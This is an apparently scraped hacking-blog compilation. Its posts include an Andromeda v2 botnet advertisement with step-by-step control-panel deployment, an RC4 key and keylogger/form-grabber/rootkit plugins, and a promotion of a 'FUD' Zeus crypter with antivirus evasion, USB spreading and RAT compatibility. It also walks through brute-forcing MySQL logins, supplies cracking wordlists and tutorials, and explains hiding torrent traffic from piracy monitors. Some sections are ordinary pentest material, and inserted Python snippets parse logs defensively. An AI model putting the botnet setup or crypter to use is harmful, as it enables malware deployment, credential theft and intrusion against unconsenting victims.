Find the Pass



Hello CHC (Chennai Hackers Connect) members, most of you cracked the previous two challenges. This challenge is gonna be difficult compared to the other two :)
Try to find out the password and make a comment.
The names of the persons who crack the password will be displayed on the Board and FB page :)

Congrats dude.









Note: Comment the password along with your Facebook ID or Gmail ID.



Andromeda v2 HTTP Botnet

Andromeda v2 + All Its Plugins

Communication between the bot and the control panel is encrypted using RC4. Installation does not need administrator privileges and does not trigger UAC. The process is protected to prevent the bot from being removed from the system. It bypasses the firewall and is injected into a trusted process. When properly installed, the exe is automatically deleted. It works on systems from XP to 7, including x64. The file weighs approximately 10 KB. It bypasses most proactive anti-virus.

Andromeda bot description: Flexible modular bot. Based on this product, you can build a botnet with extremely diverse capabilities. The bot's functions are extended with plug-ins, which can be loaded in the required quantity and at any time. The number of supported backup fields is not limited. The communication protocol between bots and the administrator is encrypted using RC4. Modules: you are free to adapt your botnet to your needs at any time. Not aggressive toward the system: it installs without administrator rights, and the UAC window does not pop up. Self-protection: unprepared users cannot remove the bot from the system. It ignores the firewall and is not conspicuous in the process list, since it injects into a trusted process. It does not drop any DLL, contains no TLS, and is easy to crypt. Regardless of whether installation succeeds, the original exe is deleted. Works on the line from WinXP to Win7, including x64 systems. Small size, written entirely in assembly language.

Overview Ar3s'a
Control Panel: It is written in PHP with MySQL. Identify the program behind NAT. Calculate statistics for the botnet: bots online / offline program / programs dead / statistics by country / statistics on the platform. Count the number of tasks completed / not completed. You can set a limit on the amount of work completed. You can give a specific reference to the bot. The distribution of tasks between the countries. Remove the entire article / remove dead bot framework.

Screenshot of the admin panel:














This bot comes with several plugins: socks4, form grabber, keylogger, ring3 rootkit.

Here is an image of the builder created by The Old Warrior.



Configuration

1. Upload /Panel files to androhost.com/andro
2. Create one mysql db.
3. Upload f.pack, r.pack and s.pack from /Plugins folder in: androhost.com/andro directory
4. chmod 777 androhost.com/andro/config.php, chmod 777 androhost.com/andro/fp_logs directory
5. Open in your browser androhost.com/andro/index.php?act=install.
6. Login with default credentials: admin:admin
7. Paste rc4 key to andromeda installation page. d40e75961383124949436f37f45a8cb6
8. Fill up all installation page with your admin user and password, plus mysql details >> click 'Install'
9. After installation is done open in your browser androhost.com/andro/ifg.php
10. Delete androhost.com/andro/ifg.php and androhost.com/andro/GeoIPCountryWhois.csv.gz
11. Open Builder.exe > change host to: http://androhost.com/andro/image.php, rc4 key to: d40e75961383124949436f37f45a8cb6 and build your bin.
12. To enable plugins, go to panel > menu > tasks > add task
Task type = install plugin
Url= http://androhost.com/andro/r.pack
Click 'Enabled' and add your task.






Wordlist for BruteForce Attack

1.1 Million Wordlist for hacking








Hello CHC (Chennai Hackers Connect) members. To crack a WPA/WPA2 pre-shared key, you need a dictionary of words as input. Basically, aircrack-ng takes each word and tests to see if it is in fact the pre-shared key.
The first and easiest way is to do an Internet search for word lists and dictionaries, or to check out web sites for password cracking tools.

Wordlists can also be created using some tools, which are also available built into BackTrack 5. For a wordlist creation tutorial, check here.





Zeus Crypter


Zeus Crypter [Bypass, Binder , Downloader ]










Features

-Power Options

---100% FUD Runtime and Scantime (By pass Kaspersky 2011, Avira and all others)

----Icon Changer

----Melt

----System Restore

----Outpost Firewall

----Windows Firewall

----Disable Regedit

-Spread Options:

----USB Spread

----Peer to Peer

-Anti Options:

----Virtual-Pc

----VMWare

----OllyDBG

----Virtual-box

----Reg Shot

----Sandboxie

----Anubis

----Joe Box

----CWSandbox

----ThreatExpert

-Fake Error Message





Working with:

Blackshades NET

Cybergate

Dark Comet

Cerberus

Turkojan

Spy-Net

xLoader

iStealer

Blackshades Stealer

HostBooter

IRC Bots

DDoSer

Albertino's RAT

Null Bot

NoiseBot

Poison Ivy

ProRAT


Rapzo Logger

Swarm IRC Bot

many more..









Reverse Engineering Video Tutorial

CRACKING (Reverse Engineering) Tutorial Videos


This cracking video tutorial is very good for beginners who would like to learn cracking (it's really recommended).
No previous knowledge is really needed !!!





With this video, you will learn :

• Olly + assembler + patching a basic reverseme
• Keyfiling the reverseme + assembler
• Basic nag removal + header problems
• Basic + aesthetic patching
• Comparing on changes in cond jumps, animate over/in, breakpoints
• "The plain stupid patching method", searching for textstrings
• Intermediate level patching, Kanal in PEiD
• Debugging with W32Dasm, RVA, VA and offset, using LordPE as a hexeditor
• Explaining the Visual Basic concept, introduction to SmartCheck and configuration

• Continued reversing techniques in VB, use of decompilers and a basic anti-anti-trick
• Intermediate patching using Olly's "pane window"
• Guiding a program by multiple patching.
• The use of API's in software, avoiding doublechecking tricks
• More difficult schemes and an introduction to inline patching
• How to study behaviour in the code, continued inlining using a pointer
• Reversing using resources
• Insights and practice in basic (self)keygenning
• Diversion code, encryption/decryption, selfmodifying code and polymorphism
• Debugger detected and anti-anti-techniques
• Packers and protectors : an introduction


• Imports rebuilding
• API Redirection
• Stolen bytes
• Patching at runtime using loaders from lena151 original
• Continued patching at runtime & unpacking armadillo standard protection
• Machine specific loaders, unpacking & debugging armadillo
• tElock + advanced patching
• Bypassing & killing server checks
• Killing & inlining a more difficult server check
• SFX, Run Trace & more advanced string searching


• Delphi in Olly & DeDe
• Author tricks, HIEW & approaches in inline patching
• The FPU, integrity checks & loader versus patcher
• Reversing techniques in packed soft & A S&R loader for aspr
• Inlining inside polymorphic code
• Keygenning

Reversing with Lena151 - Newbie Tutorial Series 01-40




Vulnerability scanning Using Metasploit and WMAP


Vulnerability scanning



A vulnerability scanner is an automated computer program designed to assess computers,
computer systems, networks or applications and look for weaknesses. The program probes a
system by sending data to it and analyzing the responses received. To identify any
vulnerabilities on the target system, a vulnerability scanner uses its vulnerability database as
reference. Don’t forget that vulnerability scanners create a lot of traffic on a network and are not
suitable if one of your objectives is to remain undetected.

WMAP – web vulnerability Scanner
WMAP is a web vulnerability scanner and is integrated with Metasploit. First of all we have to
load wmap plugin by issuing the command:

load wmap

To perform your web scan follow these steps:

Add a new target url,
wmap_sites -a http://192.168.1.5

add the site as a target,
wmap_targets -t http://192.168.1.5

list the modules that will be used to scan the remote system,
wmap_run -t

scan the target system,
wmap_run -e

to see if wmap found anything interesting, execute
hosts -c address,svcs,vulns

if wmap found any vulnerabilities, issue the command
vulns

to get more details.

NeXpose vulnerability Scanner
To import NeXpose vulnerability scanning report you have to import NeXpose xml file into MSF
database. To import xml file enter import followed by the report filename. for ex.
import /root/my_nexpose_scan.xml

To verify that the scanned hosts and vulnerability data was
imported properly, enter
hosts -c address,svcs,vulns

to check if everything was imported. Enter
vulns

to view details for the discovered vulnerabilities.

NeXpose plugin
There is a NeXpose plugin for Metasploit to run NeXpose from msfconsole. To perform a
vulnerability scan within NeXpose you have to:

Load NeXpose plugin,
load nexpose

if you need help enter
help

connect to your NeXpose server
nexpose_connect username:pass@127.0.0.1[:port]

launch a new scan with nexpose_scan followed by the target IP address, for ex.
nexpose_scan 192.168.1.5

enter
hosts -c address,svcs,vulns

to view the results,
execute
vulns

to view details for the discovered vulnerabilities.

Nessus vulnerability Scanner
To import nessus vulnerability scanning report you have to download it first by selecting your
report and hitting download. Download report in .nessus format. To import the
Nessus results file enter import followed by the report filename. for ex.
import /root/nessus_report_ftp_target.nessus

To verify that the scanned hosts and vulnerability data
was imported properly, enter
hosts -c address,svcs,vulns

to check if your targeted ip addresses,
the number of services detected, and the number of vulnerabilities found by Nessus are in the
list. Like we did with wmap, enter
vulns

to view details for the discovered vulnerabilities.
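
To see what kind of data sits behind the hosts and vulns listings after an import, here is an added example (not from the original post) that reads a .nessus v2 export directly and reports, per host, the number of services and the findings ordered by severity for triage. The embedded report is a constructed sample, its plugin IDs and names are placeholders, and the min_severity parameter is an assumption of this example.

```python
import xml.etree.ElementTree as ET

# Constructed minimal .nessus (v2) report; plugin IDs and names are placeholders.
# Reports from untrusted sources should go through a hardened parser such as defusedxml.
SAMPLE_NESSUS = """<NessusClientData_v2>
  <Report name="scan_target">
    <ReportHost name="192.168.1.5">
      <ReportItem port="0" svc_name="general" protocol="tcp" severity="0" pluginID="90001" pluginName="Placeholder host info"/>
      <ReportItem port="21" svc_name="ftp" protocol="tcp" severity="3" pluginID="90002" pluginName="Placeholder FTP finding"/>
      <ReportItem port="21" svc_name="ftp" protocol="tcp" severity="0" pluginID="90003" pluginName="Placeholder FTP banner"/>
      <ReportItem port="80" svc_name="www" protocol="tcp" severity="2" pluginID="90004" pluginName="Placeholder web finding"/>
    </ReportHost>
    <ReportHost name="192.168.1.6">
      <ReportItem port="22" svc_name="ssh" protocol="tcp" severity="1" pluginID="90005" pluginName="Placeholder SSH finding"/>
    </ReportHost>
  </Report>
</NessusClientData_v2>
"""

# Severity attribute values used in the v2 export format.
SEVERITY = {0: "info", 1: "low", 2: "medium", 3: "high", 4: "critical"}


def summarize(nessus_xml, min_severity=1):
    """Return one dict per host: address, service count, findings >= min_severity."""
    root = ET.fromstring(nessus_xml)
    hosts = []
    for host in root.iter("ReportHost"):
        services = set()
        findings = []
        for item in host.iter("ReportItem"):
            port = int(item.get("port", "0"))
            if port:  # port 0 carries host-level items, not a listening service
                services.add((port, item.get("protocol")))
            sev = int(item.get("severity", "0"))
            if sev >= min_severity:
                findings.append((sev, port, item.get("svc_name"), item.get("pluginName")))
        findings.sort(key=lambda f: (-f[0], f[1]))  # worst first, then by port
        hosts.append({"address": host.get("name"), "svcs": len(services),
                      "vulns": len(findings), "findings": findings})
    return hosts


if __name__ == "__main__":
    for h in summarize(SAMPLE_NESSUS):
        print(h["address"], "svcs:", h["svcs"], "vulns:", h["vulns"])
        for sev, port, svc, name in h["findings"]:
            print(f"  [{SEVERITY[sev]}] {port}/{svc}: {name}")
```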

Nessus plugin
There is also a Nessus plugin for Metasploit to control Nessus through Metasploit framework. To
perform a vulnerability scan within Nessus from within Metasploit follow these steps:

Load Nessus plugin,
load nessus

if you need help enter
nessus_help

authenticate to your Nessus server
nessus_connect username:pass@127.0.0.1:8834

list available scan policies by issuing,
nessus_policy_list

launch a new scan with nessus_scan_new followed by the policy number, a 
name for your scan, and your target IP address, for ex.
nessus_scan_new 1 scan_target 192.168.1.5

to see scan status while it’s running enter
nessus_scan_status

to list the available scan reports after the scan has completed, execute
nessus_report_list

command, identify the ID of the report you want to import and enter
nessus_report_get

to download the report and import it into the Metasploit database automatically. for ex
nessus_report_get 1d890f6b-be0d-1e8f-ea6f-fca1ea1402ef9563fbf028305b22


Bruteforcing MySQL using Metasploit

Bruteforcing MySQL




There is an auxiliary module in Metasploit called mysql_login which will happily query a MySQL
server for specific usernames and passwords.

To start your attack you have to set the RHOSTS option and choose a username and a password if you would like a single login query.

set RHOSTS 192.168.2.13

Let’s try a classical mysql user, root.

set USERNAME root

If you leave the password option and pass_file option blank mysql_login will attempt to login to MySQL server with blank password or with the username as password (root). Maybe we are lucky before we start brute-forcing database with a password list.

Using a password list
We can create our own password list, download one from the Internet, or use BackTrack's password list /pentest/passwords/wordlists/rockyou.txt.

Let’s create one!

Creating a password list
To create our password list we are going to use crunch. If you are using BackTrack, as I do, crunch
is already installed.

Open Privilege Escalation -> Password Attacks -> Offline Attacks -> crunch.
Otherwise download it from here.

Execute:

./crunch 6 8 abcde123456 -o passfile.lst

The above command will create passwords between 6 and 8 characters long, consisting of ascii characters a,b,c,d,e and numbers 1,2,3,4,5,6 and all generated passwords will be saved into file passfile.lst.

Using the password list
Now that we have our password list stored in /pentest/passwords/crunch/passfile.lst, we can use it in mysql_login module.

set PASS_FILE /pentest/passwords/crunch/passfile.lst

Also increase the number of concurrent threads for a faster brute-force attack.

set THREADS 50
run

More
mysql_login module offers 2 interesting and useful options, USER_FILE and USERPASS_FILE. You can use a username file list to try various usernames by setting the USER_FILE option accordingly.

With the USERPASS_FILE parameter you can use a file that contains both usernames and passwords: each username is separated from its password by a space character, and each username-password pair is written on a new line.
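
From the defender's side, a mysql_login run like the one above shows up as a burst of "Access denied" entries in the MySQL error log. The following added example (not from the original post) counts those entries per source host in a sliding window and lists hosts that tried a blank password; the log lines are constructed samples in the MySQL 5.7 error-log layout (assuming log_error_verbosity=3), and the threshold and window values are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample lines (MySQL 5.7 error-log layout, log_error_verbosity=3 assumed).
SAMPLE_LOG = """\
2024-03-01T10:00:00.100000Z 41 [Note] Access denied for user 'root'@'192.168.2.50' (using password: NO)
2024-03-01T10:00:00.400000Z 42 [Note] Access denied for user 'root'@'192.168.2.50' (using password: YES)
2024-03-01T10:00:01.000000Z 43 [Note] Access denied for user 'root'@'192.168.2.50' (using password: YES)
2024-03-01T10:00:01.300000Z 44 [Note] Access denied for user 'root'@'192.168.2.50' (using password: YES)
2024-03-01T10:00:02.000000Z 45 [Note] Access denied for user 'root'@'192.168.2.50' (using password: YES)
2024-03-01T10:00:02.500000Z 46 [Note] Access denied for user 'root'@'192.168.2.50' (using password: YES)
2024-03-01T10:00:03.000000Z 47 [Note] Aborted connection 47 to db: 'unconnected' user: 'app' host: '192.168.2.20' (Got an error reading communication packets)
2024-03-01T10:05:00.000000Z 48 [Note] Access denied for user 'app'@'192.168.2.20' (using password: YES)
2024-03-01T10:30:00.000000Z 49 [Note] Access denied for user 'app'@'192.168.2.20' (using password: YES)
"""

DENIED = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2})\.\d+Z\s+\d+\s+\[Note\]\s+"
    r"Access denied for user '(?P<user>[^']*)'@'(?P<host>[^']*)' "
    r"\(using password: (?P<pw>YES|NO)\)"
)


def parse_denied(log_text):
    """Yield (timestamp, user, host, used_password) for each failed login."""
    for line in log_text.splitlines():
        m = DENIED.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%S")
            yield ts, m["user"], m["host"], m["pw"] == "YES"


def find_bruteforce(log_text, threshold=5, window_seconds=60):
    """Return {host: peak failures inside one window} for hosts reaching the threshold."""
    window = timedelta(seconds=window_seconds)
    recent = defaultdict(deque)   # per-host timestamps still inside the window
    peak = defaultdict(int)
    for ts, _user, host, _pw in parse_denied(log_text):
        q = recent[host]
        q.append(ts)
        while ts - q[0] > window:  # drop failures older than the window
            q.popleft()
        peak[host] = max(peak[host], len(q))
    return {h: n for h, n in peak.items() if n >= threshold}


def blank_password_probes(log_text):
    """Hosts that attempted a login with no password at all."""
    return sorted({host for _ts, _u, host, pw in parse_denied(log_text) if not pw})


if __name__ == "__main__":
    print("brute-force sources:", find_bruteforce(SAMPLE_LOG))
    print("blank-password probes:", blank_password_probes(SAMPLE_LOG))
```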



Netcat - Banner Grabbing

Banner Grabbing Using netcat!




To gather more information about a service running on a system’s open port, we are going to use a well-known technique called banner grabbing, together with the netcat network tool.
nc -nvv x.x.x.x 80
-n        Suppress name/port resolutions
-v        Verbose
You will get an answer like this:
Connection to 85.25.132.39 80 port [tcp/*] succeeded!
if the connection was established.
Then type the following command:
HEAD / HTTP/1.0
To get the http headers:
HTTP/1.1 200 OK
Date: …..
Server: …..
Last-Modified: …..
ETag: ……
Accept-Ranges: bytes
Content-Length: ….
Vary: Accept-Encoding
Content-Type: text/html
Connection: close
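
The same headers tell an administrator what their own server gives away. The following added example (not from the original post) parses a captured HEAD response and lists the product/version tokens exposed by banner headers, comparing a verbose response with a trimmed one; both captures are constructed, and the list of headers checked is an assumption of this example.

```python
import re

# Constructed captures of a "HEAD / HTTP/1.0" exchange (not taken from a real host).
VERBOSE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Mon, 04 Mar 2024 09:00:00 GMT\r\n"
    "Server: Apache/2.2.22 (Debian) PHP/5.4.4\r\n"
    "X-Powered-By: PHP/5.4.4\r\n"
    "Accept-Ranges: bytes\r\n"
    "Content-Type: text/html\r\n"
    "Connection: close\r\n"
    "\r\n"
)
HARDENED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache\r\n"
    "Content-Type: text/html\r\n"
    "Connection: close\r\n"
    "\r\n"
)

# Headers that commonly carry software banners (assumed list for this example).
BANNER_HEADERS = ("server", "x-powered-by", "x-aspnet-version")
# Matches product/version tokens such as Apache/2.2.22, or a bare version like 4.0.30319.
VERSION_TOKEN = re.compile(r"(?:([A-Za-z][\w.+-]*)/)?(\d+(?:\.\d+)+[\w.-]*)")


def parse_head_response(raw):
    """Split a raw response head into (status_code, {lowercased header: value})."""
    lines = raw.replace("\r\n", "\n").split("\n")
    status_code = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        if not line:  # blank line ends the header block
            break
        name, _, value = line.partition(":")
        name, value = name.strip().lower(), value.strip()
        # repeated headers are joined, as HTTP allows
        headers[name] = f"{headers[name]}, {value}" if name in headers else value
    return status_code, headers


def disclosed_versions(raw):
    """Return sorted (header, product, version) tuples leaked by banner headers."""
    _status, headers = parse_head_response(raw)
    findings = set()
    for name in BANNER_HEADERS:
        for product, version in VERSION_TOKEN.findall(headers.get(name, "")):
            findings.add((name, product or "(unnamed)", version))
    return sorted(findings)


if __name__ == "__main__":
    for label, raw in (("verbose", VERBOSE_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(label, disclosed_versions(raw))
```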



RA1N VULNERABILITY Scanner



RA1N VULNERABILITY Scanner 0.5


Features:
  • Easy to use GUI
  • Gecko Browser engine
  • MD5 Decryption with salt support.
  • Google Dork scanning (in progress to making it load more)
  • SKID Proof <-- GF Noobs...
  • Advanced Dorking (over 1000's of dorks, and doesn't show https links)





Virus Scan:
https://www.virustotal.com/file/88f76e1f...339968391/



BTGuard To Anonymize Bittorrent Traffic

Use BTGuard To Anonymize Bittorrent Traffic

If you're using BitTorrent without taking special measures to hide your activity, it's just a matter of time before your ISP throttles your connection, sends you an ominous letter, or worst case, your ISP gets a subpoena from a lawyer asking for your identity for a file-sharing law suit. Here's how to set up a simple proxy to keep your torrenting safe and anonymous. 

Note, you don't need to be doing anything illegal. Maybe you just want to keep Big Brother out of your business and from throttling your connection. Either way, if you really want to keep your activity private, your best bet involves routing your BitTorrent connection through an external service. BTGuard is a dead simple BT-focused proxy server and encryption service, and it's my service of choice. Below, I'll explain what it does, how it works, and how to set it up to privatize and anonymize your BT traffic.



When you download or seed a torrent, you're connecting to a bunch of other people, called a swarm, all of whom—in order to share files—can see your computer's IP address. That's all very handy when you're sharing files with other netizens, but file sharers such as yourself aren't necessarily the only people paying attention. Piracy monitoring groups (often paid for by the entertainment industry either before or after they find violators) also join BitTorrent swarms, but instead of sharing files, they're logging the IP addresses of other people in the swarm—including you—so that they can notify your ISP of your doings.

A proxy (like BTGuard) funnels your internet traffic—in this case, just your BitTorrent traffic—through another server, so that the BitTorrent swarm will show an IP address from a server that can't be traced back to you instead of the address that points to your house. That way, those anti-piracy groups can't contact your ISP, and your ISP has no cause to send you a harrowing letter.

But wait, can't the piracy groups then go to the anonymizer service (BTGuard) and requisition their logs to figure out that you're the one downloading the new Harry Potter? Theoretically, yes, but the reason why we chose BTGuard is because they don't keep logs, so there's no paper trail of activity leading back to you. All the piracy monitors see is BTGuard sharing a file, and all your ISP sees is you connecting to BTGuard—but not what data you're downloading, because it's encrypted.

If you subscribe to an ISP that throttles BitTorrent traffic, and aren't using an anonymizer service, you have an additional problem. Your ISP can still see what you're doing, and if they detect that you're using BitTorrent—even if you're using it for perfectly legal purposes—they'll throttle your connection so you get unbearably slow speeds. When you encrypt your BitTorrent traffic, your ISP can't see what you're using your connection for. They'll see that you're downloading lots of information, but they won't be able to see that it's BitTorrent traffic, and thus won't throttle your connection. You still have to be careful of going over your ISP's bandwidth cap, however, if that exists.

BTGuard offers you both a proxy (to combat spying) and encryption (to combat throttling)—though many torrent clients have encryption built-in as well.

First, BTGuard isn't free. At $7/month (as little as $5 if you pay for a year in advance), it isn't very expensive, and we think it's well worth it if you want to torrent anonymously. A lawsuit settlement, if it comes to that, will cost you at least a couple thousand dollars, which equals a couple decades of BTGuard subscriptions, so keep that in mind, too. The other potential downside is that piping your downloads through another service may decrease your upload and download speeds. How much depends on what torrent you're downloading, who from, and a lot of other factors, but just know that it's a possibility.

In my experience, more popular torrents stayed at their top speed of 1.4 MB/s (my bandwidth cap) with a proxy, while other less popular torrents (which flew at 1.4MB/s without a proxy) would fluctuate around 200 or 300 kB/s with BTGuard in place. Again, though, a little longer wait on downloads is well worth the protection you get.

Lastly, proxies aren't supported by every client, which means you'll have to use one with more advanced features. uTorrent (for Windows) and Vuze (for Windows, Mac, and Linux) both support proxies, but sadly Mac and Linux favorite Transmission does not. (If you're absolutely stuck with a client that doesn't support proxies, check the end of this article for some alternative solutions to the anonymity problem.)


How to Set Up BTGuard

BTGuard has a one-click install process, but we're going to show you how to do it the manual way, since it works in any BitTorrent client that supports SOCKS5 Proxy—not just the ones supported by BTGuard's installer. It'll also give you a better sense of what exactly BTGuard does, so if you run into problems, you'll have a better idea of how to fix it.

Step One: Sign Up for BTGuard

First, sign up for an account over at BTGuard.com. It'll just take a minute, and then you can get to configuring your client. Their BitTorrent proxy service costs $6.95 a month, but you can get discounts by buying multiple months at a time (up to a year's service for $59.95). Once you're done, you should receive an email telling you that BTGuard is ready to go.

Step Two: Configure Your Client

Next, open up your torrent client of choice and find the proxy settings within its preferences. In uTorrent, for example, this is under Preferences > Connection. Your client may have them in a different place (Google around to find out where), but no matter your client, your settings should look like this:

  • Proxy Type: Socks v5
  • Proxy Host: proxy.btguard.com
  • Proxy Port: 1025
  • Username: Your BTGuard username
  • Password: Your BTGuard password
You'll also want to make sure you're using the proxy for hostname or tracker lookups as well as peer-to-peer connections, so check all boxes that say anything like that. You'll also want to disable connections or features that could compromise the proxy, so check all the boxes under uTorrent's "Proxy Privacy" section, or anything similar that your client may have. Hit Apply, exit the preferences, and restart your client. Your proxy should now be active.


Step Three: See If It's Working



To ensure that it's working, head over to CheckMyTorrentIP.com. This site can tell you what your IP address is, and compare it to the IP address of your torrent client, which will let you know whether your proxy is working correctly. To test it, hit the "Generate Torrent" button, and open the resulting torrent in your client. Then, go back to your browser and hit the Refresh button under the "Check IP" tab. If it's the same as your browser IP—which you'll see next to the Refresh button—then your proxy isn't working, and you'll want to double-check all of the above settings. If it shows a different IP address (often from another country like Germany or Canada), then BTGuard is successfully tunneling all your traffic for you.


Step Four (Optional): Enable Encryption

If you want extra security (or if you're trying to protect your connection from being throttled), you'll also want to encrypt all that traffic. Many clients have this feature built-in. In uTorrent, for example, just head to Preferences > BitTorrent and look for the "Protocol Encryption" section. Change your outgoing connection to Forced encryption, and uncheck the "Allow incoming legacy connections" box. From there, you should be good—your ISP shouldn't throttle your connection after this is enabled.

If your client doesn't support encryption, or you want a more powerful encryption behind your torrenting, BTGuard offers an encryption service as well. Just head to their Encryption page, download the software, and install it to C:\BTGUARD (this is very important; don't change the installation directory). Then, start the BTGuard Encryption program (accessible from the Start menu), and open up your BitTorrent client. Change your proxy server from proxy.btguard.com to 127.0.0.1, restart your client, and you're golden. Again, this isn't necessary if your client already supports encryption, but it is an extra layer of protection if you really want to keep everything private.

BitTorrent isn't the safe place it once was, and if you're going to use it to share and download files, we highly recommend getting some sort of protection from the services above so you can avoid DMCA notices and throttled speeds.


